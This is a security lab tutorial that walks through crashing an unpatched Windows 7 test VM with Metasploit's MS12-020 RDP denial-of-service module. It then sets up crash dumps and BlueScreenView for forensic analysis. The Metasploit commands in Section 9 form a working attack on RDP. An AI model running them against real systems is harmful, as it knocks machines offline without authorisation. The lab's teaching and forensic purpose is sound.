ComputerSecurityStudent (CSS)

[Login]

[Join Now]

|SECURITY TOOLS >> Metasploit >> Current Page

|Views: 82214

(Metasploit: MS12-020)

{ Kali 1.0: RDP Windows Exploit, Set Memory Crash Dump File }

Section 0. Background Information

What is the scenario?
- If a Windows Machine has not been patched with KB2671387 the it is susceptible to a Denial of Service (DoS) attack, which a malicious perpetrator can crash the machine and render the notorious Blue Screen of Death (BSOD). This lesson will not only illustrate the attack vector, but we will (1) set up a memory crash dump file, (2) capture the crash dump file for later investigation, (3) add and configure a new Virtual Hard Disk, and (5) install BlueScreenView.
What is the Exploit?
- The Remote Desktop Protocol (RDP) implementation in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly process packets in memory, which allows remote attackers to execute arbitrary code by sending crafted RDP packets triggering access to an object that (1) was not properly initialized or (2) is deleted, aka "Remote Desktop Protocol Vulnerability."
- Reference: http://www.cvedetails.com/cve/2012-0002/
What is Metasploit?
- The Metasploit Framework is a open source penetration tool used for developing and executing exploit code against a remote target machine it, Metasploit frame work has the world's largest database of public, tested exploits. In simple words, Metasploit can be used to test the Vulnerability of computer systems in order to protect them and on the other hand it can also be used to break into remote systems.
What is BlueScreenView?
- BlueScreenView scans all your minidump files created during 'blue screen of death' crashes, and displays the information about all crashes in one table. For each crash, BlueScreenView displays the minidump filename, the date/time of the crash, the basic crash information displayed in the blue screen (Bug Check Code and 4 parameters), and the details of the driver or module that possibly caused the crash (filename, product name, file description, and file version).
- Reference: http://nirsoft.net/utils/blue_screen_view.html
Pre-Requisite Lab
1. Kali: Lesson 1: Installing Kali 1.0
2. Damn Vulnerable Windows 7: Lesson 1: How to create a Damn Vulnerable Windows 7 Machine
Lab Notes
- In this lab we will do the following:
  1. Lower Windows 7 Memory
  2. Configure Complete Crash Dump File
  3. Illustrate Exploit
  4. Post Cleanup Windows Machine
  5. Add and Configure 5 GB Virtual Hard Disk
  6. Install BlueScreenView
Legal Disclaimer
- As a condition of your use of this Web site, you warrant to computersecuritystudent.com that you will not use this Web site for any purpose that is unlawful or that is prohibited by these terms, conditions, and notices.
- In accordance with UCC § 2-316, this product is provided with "no warranties, either express or implied." The information contained is provided "as-is", with "no guarantee of merchantability."
- In addition, this is a teaching website that does not condone malicious behavior of any kind.
- You are on notice, that continuing and/or using this lab outside your "own" test environment is considered malicious and is against the law.
- © 2016 No content replication of any kind is allowed without express written permission.

Section 1: Start your Windows 7 VM

Open VMware Player on your windows machine.
- Instructions:
  1. Click the Start Button
  2. Type "vmware player" in the search box
  3. Click on VMware Player
Edit Virtual Machine Settings
- Instructions:
  1. Click on Damn Vulnerable Windows 7
  2. Click on Edit virtual machine settings
Configure CD/DVE(IDE)
- Instructions:
  1. Select CD/DVD (IDE)
  2. Click on the Use physical drive: radio button
  3. Select Auto detect
- Note(FYI):
  1. Do not click on the OK Button
Configure Memory
- Instructions:
  1. Select Memory
  2. Click on "512 MB"
- Note(FYI):
  - Temporarily lower the amount of memory to 512 MB to limit the size of the crash dump file that we will later analyze in a proceeding lesson.
Configure Network Adapter
- Instructions:
  1. Select Network Adapter
  2. Click the radio button "NAT: Used to share the host's IP address"
  3. Click the OK button
- Note(FYI):
  1. We will use NAT instead of bridged, because of multiple VMware Player issues with Windows 7 not acquiring an IP Address when using a Wireless connection.
Start Damn Vulnerable Windows 7
- Instructions:
  1. Click on Damn Vulnerable Windows 7
  2. Click on Play virtual machine

Section 2: Login to Windows 7

Select Login User
- Instructions:
  1. Click on Security Student
- Note(FYI):
  - Security Student does belong to the Administrators group.
Login as Security Student
- Instructions:
  1. Supply the student password (abc123).
  2. Click on the arrow

Section 3: Configure Remote Settings

Open System Panel
- Instructions:
  1. Click the Windows Start Button
  2. Search for System
  3. Click System
Open Remote Settings
- Instructions:
  1. Click on Remote settings
Configure Remote Settings (Part 1)
- Instructions:
  1. Remote Assistance:
    - Check Allow Remote Assistance connections to this computer
  2. Remote Desktop
    - Allow connections from computers running any version of Remote Desktop (less secure)
  3. Click the OK Button

Section 4: Configure Crash Dump

Open System Panel(On Damn Vulnerable Windows 7)
- Instructions:
  1. Click the Windows Start Button
  2. Search for System
  3. Click System
Advanced system settings
- Instructions:
  1. Click on Advanced system settings
Advanced system settings
- Instructions:
  1. Click on Advanced tab
  2. Click the Startup and Recovery Settings Button
Complete memory dump
- Instructions:
  1. Check Write an event to the system log
  2. Un-Check Automatically restart
  3. Select Complete memory dump
  4. Dump file: %SystemRoot%\MEMORY.DMP
  5. Check Overwrite any existing file
  6. Click the OK button
  7. Click the System Properties Restart Message OK Button
- Note(FYI):
  - Step #2, We do not want the endpoint to reboot, because we will later save the Blue Screen of Death and use the various memory addresses for our subsequent memory investigation.
Restart Machine
- Instructions:
  1. Click the Start Button
  2. Click the Arrow next to Shutdown
  3. Click Restart

Section 5: Login to Windows 7

Select Login User
- Instructions:
  1. Click on Security Student
- Note(FYI):
  - Security Student does belong to the Administrators group.
Switch User
- Instructions:
  1. Supply the student password (abc123).
  2. Click on the arrow

Section 6: Verify you have a Network IP Address

Bring up Command Prompt
- Instructions:
  1. Click the Windows Start Button
  2. Type cmd in the search box
  3. Click on cmd
Record IP Address
- Instructions:
  1. ipconfig
  2. Record your IP Address
- Notes(FYI):
  1. In my case, my IP Address is 192.168.121.172.
  2. In your case, your IP Address will probably be different.
Command History
- Instructions:
  1. echo "MS12_020 RDP DoS Attack"
- Notes(FYI):
  - In the following lesson, we will use Volatility to interrogate and retrieve the command history: (1) ipconfig and (2) echo "MS12...."

Section 7: Configure Kali Virtual Machine Settings

Open VMware Player on your windows machine.
- Instructions:
  1. Click the Start Button
  2. Type "vmware player" in the search box
  3. Click on VMware Player
Edit Virtual Machine Settings
- Instructions:
  1. Click on Kali
  2. Edit Virtual Machine Settings
- Note:
  - Before beginning a lesson it is necessary to check the following VM settings.
Configure CD/DVD
- Instructions:
  1. Click on CD/DVD (IDE)
  2. Click on the radio button "Use physical drive:"
  3. Select Auto detect
Configure Memory
- Instructions:
  1. Click on Memory
  2. Click on "1 GB"
Set Network Adapter
- Instructions:
  1. Click on Network Adapter
  2. Click the radio button "NAT: Used to share the host's IP Address"
  3. Click the OK Button

Section 8: Play and Login to Kali

Start Up Kali
- Instructions:
  1. Click on Kali
  2. Play virtual machine
Supply Username
- Instructions:
  1. Click Other...
  2. Username: root
  3. Click the Log In Button
Supply Password
- Instructions:
  1. Password: <Provide you Kali root password>
  2. Click the Log In Button
Open a Terminal Window
- Instructions:
  1. Click on Applications
  2. Accessories --> Terminal
Obtain Kali's IP Address
- Instructions:
  1. ifconfig
  2. Record your IP Address
- Note(FYI):
  - Command #1, Use (ifconfig) to to display Kali's IP Address.
  - Command #2, Record Your IP Address.
    - Mine is 192.168.121.170.
    - Your will probably be different.

Section 9: Start msfconsole

Make a Forensics Directory
- Instructions:
  1. mkdir -p /forensics/ms12_020
  2. cd /forensics/ms12_020
  3. script ms12_020.txt
- Notes(FYI):
  - Command #1, Create a directory named (/forensics/ms12_020). Use the (-p) to make the parent directory if it does not exists. The (-p) flag will also suppress errors if the directory exists.
  - Command #2, Navigate to the (/forensics/ms12_020) directory.
  - Command #3, Use (script) to record all inputs (commands) and outputs displayed on the terminal, which will be recorded in file (ms12_020.txt).
Start msfconsole
- Instructions:
  1. msfconsole
- Note(FYI):
  1. Command #1, The msfconsole provides an “all-in-one” centralized console and allows you efficient access to virtually all of the options available in the MSF.
Search and Use MS12-020
- Instructions:
  1. search ms12_020
  2. use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
- Note(FYI):
  - Command #1, Search Metasploit for any modules that contain the string (ms12_020).
  - Command #2, Use the MS12-020 Denial Of Service module for Remote Desktop (RDP).
Read MS12-020 Description
- Instructions:
  1. info
  2. Read the description
- Note(FYI):
  - Command #1, Use the (info) command to display the Module (Name, Author, Options, Descriptions and References).
Search and Use MS12-020
- Notes(FYI):
  - Replace (192.168.121.172) with Damn Vulnerable Windows 7 address obtained from [Section 6, Step 3].
- Instructions:
  1. show options
  2. set RHOST 192.168.121.172
  3. show options
- Note(FYI):
  - Command #1, Use (show options) to determine the module requirements. Notice that The target RHOST address is required.
  - Command #2, Set RHOST to the IP Address of Damn Vulnerable Windows 7 obtained from [Section 6, Step 3].
  - Command #3, Use (show options) to verified that RHOST was set.
Exploit RDP
- Instructions:
  1. exploit
  2. exit
  3. exit
- Note(FYI):
  - Command #1, Use (exploit) to commence the attack.
  - Command #2, Exit from the msfconsole.
  - Command #3, Exit from script.

Section 10: Save Blue Screen of Death Screenshot

Save a Screenshot (On Damn Vulnerable Windows 7)
- Instructions:
  1. Press <Ctrl> and <Alt>
  2. Press <PrtScn>
  3. Paste into MS Paint
  4. Save MS Paint File
- Note(FYI):
  - It is very important you save this screen for the subsequent memory analysis lesson that we will conduct for this particular attack vector.
Shut Down Damn Vulnerable Windows 7
- Instructions:
  1. Player --> Power --> Shut Down Guest
  2. Select Yes

Section 11: Post Clean Up and Add Virtual Hard Disk

Open VMware Player on your windows machine.
- Instructions:
  1. Click the Start Button
  2. Type "vmware player" in the search box
  3. Click on VMware Player
Edit Virtual Machine Settings
- Instructions:
  1. Click on Damn Vulnerable Windows 7
  2. Click on Edit virtual machine settings
Add Hard Disk
- Instructions:
  1. Click the Add... button
  2. Click the Hard Disk
  3. Click the Next button
Select a Disk
- Instructions:
  1. Select Create a new virtual disk
  2. Click the Next button
Select a Disk Type
- Instructions:
  1. Select the IDE radio button
  2. Click the Next button
Specify Disk Capacity
- Instructions:
  1. Maximum disk size (GB): 5.0
  2. Click on the Store virtual disk as a single file radio button
  3. Click the Next button
- Note(FYI):
  - We are creating a 5.0 GB Virtual Hard Drive for the subsequent corresponding memory analysis lesson.
Specify Disk File
- Instructions:
  1. Disk file: FORENSICS.vmdk
  2. Click the Finish button
Configure CD/DVE(IDE)
- Instructions:
  1. Select CD/DVD (IDE)
  2. Click on the Use physical drive: radio button
  3. Select Auto detect
- Note(FYI):
  - Do not click on the OK Button
Configure Memory
- Instructions:
  1. Select Memory
  2. Click on "1 GB"
- Note(FYI):
  - Do not click on the OK Button
  - Earlier, we lowered the amount of memory to 512 MB to limit the size of the crash dump file. Now that we have the crash dump file, we can set the memory used back to the recommended requirement.
Configure Network Adapter
- Instructions:
  1. Select Network Adapter
  2. Click the radio button "NAT: Used to share the host's IP address"
  3. Click the OK button
- Note(FYI):
  - We will use NAT instead of bridged, because of multiple VMware Player issues with Windows 7 not acquiring an IP Address when using a Wireless connection.
Start Damn Vulnerable Windows 7
- Instructions:
  1. Click on Damn Vulnerable Windows 7
  2. Click on Play virtual machine
Windows Error Recovery
- Instructions:
  1. Arrow Down to Start Windows Normally
  2. Press <Enter>

Section 12: Login to Windows 7

Select Login User (On Damn Vulnerable Windows 7)
- Instructions:
  1. Click on Security Student
- Note(FYI):
  - Security Student does belong to the Administrators group.
Login as Security Student
- Instructions:
  1. Supply the student password (abc123).
  2. Click on the arrow
Windows Recovery Message
- Instructions:
  1. Click the Cancel Button
- Note(FYI):
  - We will investigate the unexpected shutdown in a subsequent lesson.
Open Command Prompt
- Instructions:
  1. Click the Start Button
  2. Search for command prompt
  3. Click on the Command Prompt
Verify Crash Dump File
- Instructions:
  1. cd C:\Windows
  2. dir MEMORY.DMP
- Note(FYI):
  - Command #2, verify this Memory Dump file exists. Notice that file size of the MEMORY.DMP file is 512 KB.

Section 14: Configure Hard Drive

Open Computer Management (On Damn Vulnerable Windows 7)
- Instructions:
  1. Click the Start button
  2. Search for computer management
  3. Click on Computer Management
- Note(FYI):
  - Although we created a Virtual Hard Disk, we need to tell the Windows Operating System to (1)initialize it, (2) create a simple volume, (3) label it,(4) specify the size, and (5) assign a drive letter.
Initialize Disk
- Instructions:
  1. Click on Disk Management
  2. Check Disk 1
  3. Select MBR (Master Boot Record)
  4. Click the OK Button
Create New Simple Volume...
- Instructions:
  1. Right Click on 5.0 GB Unallocated
  2. Click on New Simple Volume...
New Simple Volume Wizard
- Instructions:
  1. Click the Next button
Specify Volume Size
- Instructions:
  1. Simple volume size in MB: 5117
  2. Click the Next button
Assign Drive Letter or Path
- Instructions:
  1. Click on Assign the following drive letter radio button
  2. Select drive letter Z
  3. Click the Next button
Format Partition
- Instructions:
  1. Click the Format this volume with the following settings: radio button.
  2. File system: NTFS
  3. Allocation unit size: Default
  4. Volume label: FORENSICS
  5. Check Perform a quick format
  6. Click the Next button
Completed New Simple Volume Wizard
- Instructions:
  1. Click the Finish button

Section 14: Download NirSoft BlueScreenView

Download BlueScreenView (On Damn Vulnerable Windows 7)
- Instructions:
  1. Navigate to the following Address
    - http://www.nirsoft.net/utils/bluescreenview.zip
  2. Click the Save File radio button
  3. Click the OK button
Choose Download Location
- Instructions:
  1. Navigate to Download Directory
    - Z:\
  2. Filename: bluescreenview
  3. Click the Save button
Open Containing Folder
- Instructions:
  1. Tools --> Downloads
  2. Right Click on bluescreenview.zip
  3. Click on Open Containing Folder
Extract bluescreenview
- Instructions:
  1. Right Click on bluescreenview
  2. Touch 7-Zip
  3. Click on Extract to "bluescreenview\"
Open bluescreenview folder
- Instructions:
  1. Right Click on bluescreenview
  2. Click on Open
Run BlueScreenView
- Instructions:
  1. Right Click on BlueScreenView
  2. Click on Open
User Account Control
- Instructions:
  1. Click the Yes button
Display Blue Screen in XP Style
- Instructions:
  1. Option --> Lower Pane Mode --> Blue Screen in XP Style
Select All Blue Screen Text
- Instructions:
  1. Right Click in the Blue Screen Frame
  2. Click Select All
Copy Blue Screen Text
- Instructions:
  1. Right Click in the Blue Screen Frame
  2. Click Copy
Open Notepad
- Instructions:
  1. Click the Start Button
  2. Search for notepad
  3. Click on Notepad
- .
Paste Blue Screen Text
- Instructions:
  1. Edit --> Paste
Save File (Part 1)
- Instructions:
  1. File --> Save As...
Save File (Part 2)
- Instructions:
  1. Navigate to the following directory
    - Z:\bluescreenview
  2. File name: rdp_ms12_020.txt
  3. Click the Save Button
- Note(FYI):
  - We will use this blue screen information for a subsequent memory analysis lesson.

Section 15: Proof of Lab

Open a Terminal Window (On Kali)
- Instructions:
  1. Click on Applications
  2. Accessories --> Terminal
Proof of Lab
- Instructions:
  1. cd /forensics/ms12_020
  2. grep -i rhost ms12_020.txt
  3. grep -i send ms12_020.txt
  4. date
  5. echo "Your Name"
    - Replace the string "Your Name" with your actual name.
    - e.g., echo "John Gray"
- Note(FYI):
  - Command #1, Change directory to /forensics/ms12_020.
  - Command #2, Use the command (grep) to display only lines that contain the string (rhost) in the script file (ms12_020.txt). Use the flag(-i) to ignore case for the string (rhost).
  - Command #3, Use the command (grep) to display only lines that contain the string (send) in the script file (ms12_020.txt). Use the flag(-i) to ignore case for the string (send).
- Proof of Lab Instructions:
  1. Do a PrtScn
  2. Paste into a word document
  3. Upload to Moodle